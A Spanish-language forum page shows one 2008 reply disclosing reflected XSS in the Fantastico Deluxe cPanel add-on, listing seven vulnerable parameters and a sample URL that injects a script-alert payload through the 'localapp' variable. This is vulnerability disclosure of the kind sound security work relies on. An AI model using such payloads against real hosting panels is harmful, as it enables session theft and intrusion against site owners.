Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Camael

Páginas1
#1
Nivel Web / Re: [°] XSS en "Fantastico Deluxe" (Hosting Cpanel)
23 Noviembre 2008, 21:02 PM
Hay más variables vulnerables, aquí tenéis una pequeña lista:

Código [Seleccionar]
$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion

Se usa así:

Código [Seleccionar]
https://dominio.com:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrad e%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

donde "localapp" es el nombre de variable.
Páginas1